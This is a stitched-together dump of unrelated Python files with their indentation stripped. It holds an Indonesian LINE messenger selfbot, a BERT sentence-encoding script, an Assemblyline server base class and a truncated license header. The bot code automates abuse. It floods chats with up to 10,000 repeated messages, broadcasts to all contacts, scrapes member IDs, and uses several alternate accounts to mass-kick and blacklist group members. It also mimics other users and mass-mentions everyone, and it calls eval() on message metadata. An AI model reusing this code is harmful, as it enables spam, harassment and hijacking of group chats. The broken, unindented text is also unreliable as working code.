tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
elif msg.text in ["Masuk!"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
#cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Pulang!"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif "!!!" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//500
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*500 : (j+1)*500]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 26:
msg=op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
if op.type == 26:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = (cl.getProfile().displayName+" sedang sibuk/Off \nPenting Chat aja 👇👇👇")
jawaban = (jawab)
cl.sendText(msg.to,jawaban)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
if op.type == 32:
OWN = "u78e5efff85bf97393cc2c4b8ecf93d25"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
cl.sendText
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil ['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
extract_feature.py
|
import modeling
import tokenization
from graph import optimize_graph
import args
from queue import Queue
from threading import Thread
import tensorflow as tf
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class InputExample(object):
def __init__(self, unique_id, text_a, text_b):
self.unique_id = unique_id
self.text_a = text_a
self.text_b = text_b
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids):
self.unique_id = unique_id
self.tokens = tokens
self.input_ids = input_ids
self.input_mask = input_mask
self.input_type_ids = input_type_ids
class BertVector:
def __init__(self, batch_size=32):
"""
init BertVector
:param batch_size: Depending on your memory default is 32
"""
self.max_seq_length = args.max_seq_len
self.layer_indexes = args.layer_indexes
self.gpu_memory_fraction = 1
self.graph_path = optimize_graph()
self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
self.batch_size = batch_size
self.estimator = self.get_estimator()
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
self.predict_thread.start()
def get_estimator(self):
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.estimator.model_fn import EstimatorSpec
def model_fn(features, labels, mode, params):
with tf.gfile.GFile(self.graph_path, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
input_names = ['input_ids', 'input_mask', 'input_type_ids']
output = tf.import_graph_def(graph_def,
input_map={k + ':0': features[k] for k in input_names},
return_elements=['final_encodes:0'])
return EstimatorSpec(mode=mode, predictions={
'encodes': output[0]
})
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction
config.log_device_placement = False
config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
return Estimator(model_fn=model_fn, config=RunConfig(session_config=config),
params={'batch_size': self.batch_size})
def predict_from_queue(self):
prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False)
for i in prediction:
self.output_queue.put(i)
def encode(self, sentence):
self.input_queue.put(sentence)
prediction = self.output_queue.get()['encodes']
return prediction
def queue_predict_input_fn(self):
return (tf.data.Dataset.from_generator(
self.generate_from_queue,
output_types={'unique_ids': tf.int32,
'input_ids': tf.int32,
'input_mask': tf.int32,
'input_type_ids': tf.int32},
output_shapes={
'unique_ids': (None,),
'input_ids': (None, self.max_seq_length),
'input_mask': (None, self.max_seq_length),
'input_type_ids': (None, self.max_seq_length)}).prefetch(10))
def generate_from_queue(self):
while True:
features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer))
yield {
'unique_ids': [f.unique_id for f in features],
'input_ids': [f.input_ids for f in features],
'input_mask': [f.input_mask for f in features],
'input_type_ids': [f.input_type_ids for f in features]
}
def input_fn_builder(self, features, seq_length):
"""Creates an `input_fn` closure to be passed to Estimator."""
all_unique_ids = []
all_input_ids = []
all_input_mask = []
all_input_type_ids = []
for feature in features:
all_unique_ids.append(feature.unique_id)
all_input_ids.append(feature.input_ids)
all_input_mask.append(feature.input_mask)
all_input_type_ids.append(feature.input_type_ids)
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
num_examples = len(features)
# This is for demo purposes and does NOT scale to large data sets. We do
# not use Dataset.from_generator() because that uses tf.py_func which is
# not TPU compatible. The right way to load data is with TFRecordReader.
d = tf.data.Dataset.from_tensor_slices({
"unique_ids":
tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32),
"input_ids":
tf.constant(
all_input_ids, shape=[num_examples, seq_length],
dtype=tf.int32),
"input_mask":
tf.constant(
all_input_mask,
shape=[num_examples, seq_length],
dtype=tf.int32),
"input_type_ids":
tf.constant(
all_input_type_ids,
shape=[num_examples, seq_length],
dtype=tf.int32),
})
d = d.batch(batch_size=batch_size, drop_remainder=False)
return d
return input_fn
def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
input_type_ids = features["input_type_ids"]
jit_scope = tf.contrib.compiler.jit.experimental_jit_scope
with jit_scope():
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=input_type_ids)
if mode != tf.estimator.ModeKeys.PREDICT:
raise ValueError("Only PREDICT modes are supported: %s" % (mode))
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,
init_checkpoint)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
all_layers = model.get_all_encoder_layers()
predictions = {
"unique_id": unique_ids,
}
for (i, layer_index) in enumerate(layer_indexes):
predictions["layer_output_%d" % i] = all_layers[layer_index]
from tensorflow.python.estimator.model_fn import EstimatorSpec
output_spec = EstimatorSpec(mode=mode, predictions=predictions)
return output_spec
return model_fn
def convert_examples_to_features(self, seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
features = []
input_masks = []
examples = self._to_example(self.input_queue.get())
for (ex_index, example) in enumerate(examples):
tokens_a = tokenizer.tokenize(example.text_a)
# if the sentences's length is more than seq_length, only use sentence's left part
if len(tokens_a) > seq_length - 2:
tokens_a = tokens_a[0:(seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
input_type_ids = []
tokens.append("[CLS]")
input_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
input_type_ids.append(0)
tokens.append("[SEP]")
input_type_ids.append(0)
# Where "input_ids" are tokens's index in vocabulary
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
input_masks.append(input_mask)
# Zero-pad up to the sequence length.
while len(input_ids) < seq_length:
input_ids.append(0)
input_mask.append(0)
input_type_ids.append(0)
assert len(input_ids) == seq_length
assert len(input_mask) == seq_length
assert len(input_type_ids) == seq_length
if ex_index < 5:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (example.unique_id))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info(
"input_type_ids: %s" % " ".join([str(x) for x in input_type_ids]))
yield InputFeatures(
unique_id=example.unique_id,
tokens=tokens,
input_ids=input_ids,
input_mask=input_mask,
input_type_ids=input_type_ids)
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
@staticmethod
def _to_example(sentences):
import re
"""
sentences to InputExample
:param sentences: list of strings
:return: list of InputExample
"""
unique_id = 0
for ss in sentences:
line = tokenization.convert_to_unicode(ss)
if not line:
continue
line = line.strip()
text_a = None
text_b = None
m = re.match(r"^(.*) \|\|\| (.*)$", line)
if m is None:
text_a = line
else:
text_a = m.group(1)
text_b = m.group(2)
yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)
unique_id += 1
if __name__ == "__main__":
bert = BertVector()
# while True:
# question = input('question: ')
vectors = bert.encode(['你好', '哈哈'])
print(str(vectors))
|
server_base.py
|
"""
A base classes and utilities to provide a common set of behaviours for
the assemblyline core server nodes.
"""
import enum
import time
import threading
import logging
import signal
import sys
import io
import os
from typing import cast, Dict
from assemblyline.remote.datatypes import get_client
from assemblyline.remote.datatypes.hash import Hash
from assemblyline.odm.models.service import Service
from assemblyline.common import forge, log as al_log
SHUTDOWN_SECONDS_LIMIT = 10
# Don't write to the heartbeat file if it hasn't been at least this many seconds since the last write.
HEARTBEAT_TIME_LIMIT = 3
class ServerBase(threading.Thread):
"""Utility class for Assemblyline server processes.
Inheriting from thread so that the main work is done off the main thread.
This lets the main thread handle interrupts properly, even when the workload
makes a blocking call that would normally stop this.
"""
def __init__(self, component_name: str, logger: logging.Logger = None,
shutdown_timeout: float = SHUTDOWN_SECONDS_LIMIT, config=None):
super().__init__(name=component_name)
al_log.init_logging(component_name)
self.config = config or forge.get_config()
self.running = None
self.log = logger or logging.getLogger(component_name)
self._exception = None
self._traceback = None
self._shutdown_timeout = shutdown_timeout if shutdown_timeout is not None else SHUTDOWN_SECONDS_LIMIT
self._old_sigint = None
self._old_sigterm = None
self._stopped = False
self._last_heartbeat = 0
def __enter__(self):
self.log.info(f"Initialized")
return self
def __exit__(self, _exc_type, _exc_val, _exc_tb):
self.close()
if _exc_type is not None:
self.log.exception(f'Terminated because of an {_exc_type} exception')
else:
self.log.info(f'Terminated')
def __stop(self):
"""Hard stop, can still be blocked in some cases, but we should try to avoid them."""
time.sleep(self._shutdown_timeout)
self.log.error(f"Server has shutdown hard after waiting {self._shutdown_timeout} seconds to stop")
if not self._stopped:
self._stopped = True
exit(1) # So any static analysis tools get the behaviour of this function 'correct'
import ctypes
ctypes.string_at(0) # SEGFAULT out of here
def close(self):
pass
def interrupt_handler(self, signum, stack_frame):
self.log.info(f"Instance caught signal. Coming down...")
self.stop()
if signum == signal.SIGINT and self._old_sigint:
self._old_sigint(signum, stack_frame)
if signum == signal.SIGTERM and self._old_sigterm:
self._old_sigterm(signum, stack_frame)
def raising_join(self):
self.join()
if self._traceback and self._exception:
raise self._exception.with_traceback(self._traceback)
# noinspection PyBroadException
def run(self):
try:
self.try_run()
except Exception:
_, self._exception, self._traceback = sys.exc_info()
self.log.exception("Exiting:")
def serve_forever(self):
self.start()
self.join()
def start(self):
"""Start the server workload."""
self.running = True
super().start()
self.log.info(f"Started")
self._old_sigint = signal.signal(signal.SIGINT, self.interrupt_handler)
self._old_sigterm = signal.signal(signal.SIGTERM, self.interrupt_handler)
def stop(self):
"""Ask nicely for the server to stop.
After a timeout, a hard stop will be triggered.
"""
# The running loops should stop within a few seconds of this flag being set.
self.running = False
# If it doesn't stop within a few seconds, this other thread should kill the entire process
stop_thread = threading.Thread(target=self.__stop)
stop_thread.daemon = True
stop_thread.start()
def try_run(self):
pass
def heartbeat(self, timestamp: int = None):
"""Touch a special file on disk to indicate this service is responsive.
This should be called in the main processing loop of a component, calling it in
a background thread defeats the purpose. Ideally it should be called at least a couple
times a minute.
"""
if timestamp is not None:
timestamp = (timestamp, timestamp)
if self.config.logging.heartbeat_file:
# Only do the heartbeat every few seconds at most. If a fast component is
# calling this for every message processed we don't want to slow it down
# by doing a "disk" system call every few milliseconds
now = time.time()
if now - self._last_heartbeat < HEARTBEAT_TIME_LIMIT:
return
self._last_heartbeat = now
with io.open(self.config.logging.heartbeat_file, 'ab'):
os.utime(self.config.logging.heartbeat_file, times=timestamp)
def sleep_with_heartbeat(self, duration):
"""Sleep while calling heartbeat periodically."""
while duration > 0:
self.heartbeat()
sleep_time = min(duration, HEARTBEAT_TIME_LIMIT * 2)
time.sleep(sleep_time)
duration -= sleep_time
# This table in redis tells us about the current stage of operation a service is in.
# This is complementary to the 'enabled' flag in the service spec.
# If the service is marked as enabled=true, each component should take steps needed to move it to the 'Running' stage.
# If the service is marked as enabled=false, each component should take steps needed to stop it.
class ServiceStage(enum.IntEnum):
# A service is not running
# - if enabled scaler will start dependent containers and move to next stage
Off = 0
# A service is not running, but dependencies have been started
# - if enabled updater will try to
Update = 1
# At this stage scaler will begin
Running = 2
Paused = 3
# If at any time a service is disabled, scaler will stop the dependent containers
def get_service_stage_hash(redis):
"""A hash from service name to ServiceStage enum values."""
return Hash('service-stage', redis)
class CoreBase(ServerBase):
"""Expands the basic server setup in server base with some initialization steps most core servers take."""
def __init__(self, component_name: str, logger: logging.Logger = None,
shutdown_timeout: float = None, config=None, datastore=None,
redis=None, redis_persist=None):
super().__init__(component_name=component_name, logger=logger, shutdown_timeout=shutdown_timeout, config=config)
self.datastore = datastore or forge.get_datastore(self.config)
# Connect to all of our persistent redis structures
self.redis = redis or get_client(
host=self.config.core.redis.nonpersistent.host,
port=self.config.core.redis.nonpersistent.port,
private=False,
)
self.redis_persist = redis_persist or get_client(
host=self.config.core.redis.persistent.host,
port=self.config.core.redis.persistent.port,
private=False,
)
# Create a cached service data object, and access to the service status
self.service_info = cast(Dict[str, Service], forge.CachedObject(self._get_services))
self._service_stage_hash = get_service_stage_hash(self.redis)
def _get_services(self):
# noinspection PyUnresolvedReferences
return {x.name: x for x in self.datastore.list_all_services(full=True)}
def get_service_stage(self, service_name: str) -> ServiceStage:
return ServiceStage(self._service_stage_hash.get(service_name) or ServiceStage.Off)
def is_service_running(self, service_name: str) -> bool:
# TODO should we add an option to just return off/running based on the service
# enabled/disabled flag when doing development
return self.service_info[service_name].enabled and self.get_service_stage(service_name) == ServiceStage.Running
|
__init__.py
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
